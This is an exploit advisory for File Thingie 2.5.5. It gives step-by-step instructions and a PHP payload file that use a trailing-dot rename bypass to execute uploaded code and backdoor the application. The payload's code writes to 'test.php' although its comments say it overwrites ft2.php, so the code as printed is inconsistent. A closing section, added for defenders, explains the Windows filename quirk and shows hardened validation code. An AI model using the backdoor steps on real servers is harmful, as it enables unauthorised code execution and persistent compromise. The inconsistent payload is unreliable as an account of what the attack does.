[#]----------------------------------------------------------------------------------------]
[#]  Title: File Thingie v2.5.5 File Security Bypass
[#]  Author: Jeremiah Talamantes (RedTeam Security)
[#]  Website: http://www.redteamsecure.com/labs
[#]  Date: 5/15/2010
[#] 
[#]  Application: File Thingie
[#]  Version: 2.5.5
[#]  Link: http://www.solitude.dk/filethingie/download  
[#]  Description: There are security controls in place that attempt to prevent
[#]  users from uploading PHP files and from renaming files to PHP extensions. However,
[#]  there are no further controls that would prevent a user from uploading a text
[#]  file containing PHP code. An attacker can exploit a weakness in the file rename
[#]  process to rename a text file (containing code) to a .php extension and
[#]  execute the script.
[#]
[#]  This exploit demonstrates a way to backdoor File Thingie by uploading an *.inc file
[#]  that contains a backdoored copy of File Thingie, then uploading a *.txt file
[#]  containing some PHP code that will overwrite ft2.php to execute the backdoored
[#]  copy of File Thingie. Before that can happen, the *.txt file has to be renamed
[#]  to a *.php file and then executed in the browser.
[#]
[#]  Test Environment
[#]  * Tested on WAMP Server 2.0
[#]  * WAMP running on Windows XP, SP2 (EN)
[#]----------------------------------------------------------------------------------------]


[ EXPLOIT ---------------------------------------------------------------------------------]

1. Log in to File Thingie

2. Upload the backdoored copy of File Thingie titled:  backdoor.inc

3. Upload hack.txt (see the contents below)

4. Rename hack.txt: go to the rename section in File Thingie and type the following
in the rename box, being sure to add the period at the end:  hack.php.

5. Execute hack.php by opening it in a browser. Example: http://localhost/file_thingie/hack.php
This script will backdoor ft2.php. See backdoor.inc for the modifications to the original
File Thingie source code.

6. The end.

[ EXPLOIT ---------------------------------------------------------------------------------]




[ HACK.TXT ---------------------------------------------------------------------------------]
<?php
#
# After renaming this file to a *.php extension, it opens ft2.php and replaces it with
# an include to the backdoor.inc
#

$backdoor='<?php
include(\'backdoor.inc\');
?>
';

 if (file_exists("ft2.php") && file_exists("backdoor.inc"))
 {
	$config_thingie = "test.php";
	$fh = fopen($config_thingie, 'w');
	fwrite($fh,$backdoor) or die ("");
	fclose($fh);
	echo 'ft2.php has been backdoored.';
} else {
	echo 'Error: ft2.php and/or backdoor.inc do not exist.';
}
?>
[ HACK.TXT ---------------------------------------------------------------------------------]
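
Windows, the tested platform, strips trailing dots and spaces from a file name when it stores it, so a rename check that inspects the name as typed can be passed by a name like the one in step 4. The PHP below is an added example for defenders, not File Thingie code and not the author's: it puts a weak extension check beside a hardened one. The function names, the extension lists and the form of the weak check are assumptions.

```php
<?php
// Added example, not File Thingie code. Names and extension lists are hypothetical.
const BLOCKED_EXT = ['php', 'phtml', 'inc'];
const ALLOWED_EXT = ['txt', 'jpg', 'png', 'gif', 'pdf'];

// Weak form (assumed): deny-list test on the text after the last dot, as typed.
function naive_is_allowed(string $name): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return !in_array($ext, BLOCKED_EXT, true);
}

// Hardened form: reject names the OS would rewrite, then allow-list the extension.
function hardened_is_allowed(string $name): bool
{
    // No empty names, control bytes, path separators or NTFS stream colons.
    if ($name === '' || preg_match('/[\x00-\x1f\/\\\\:]/', $name)) {
        return false;
    }
    // Windows strips trailing dots and spaces when it stores the name, so
    // "hack.php." lands on disk as "hack.php". Refuse such names outright.
    if (rtrim($name, '. ') !== $name) {
        return false;
    }
    $segments = explode('.', strtolower($name));
    array_shift($segments);               // drop the base name
    if ($segments === []) {
        return false;                     // no extension at all
    }
    foreach ($segments as $seg) {         // blocked extension anywhere in the name
        if (in_array($seg, BLOCKED_EXT, true)) {
            return false;
        }
    }
    return in_array(end($segments), ALLOWED_EXT, true);
}

// Constructed rename targets, including the one from step 4.
foreach (['notes.txt', 'hack.php', 'hack.php.', 'backdoor.inc'] as $target) {
    printf("%-14s naive=%-5s hardened=%s\n",
        '"' . $target . '"',
        naive_is_allowed($target) ? 'allow' : 'deny',
        hardened_is_allowed($target) ? 'allow' : 'deny');
}
```

The same validation belongs on upload as well as rename, since the chain above depends on both backdoor.inc and hack.txt being accepted.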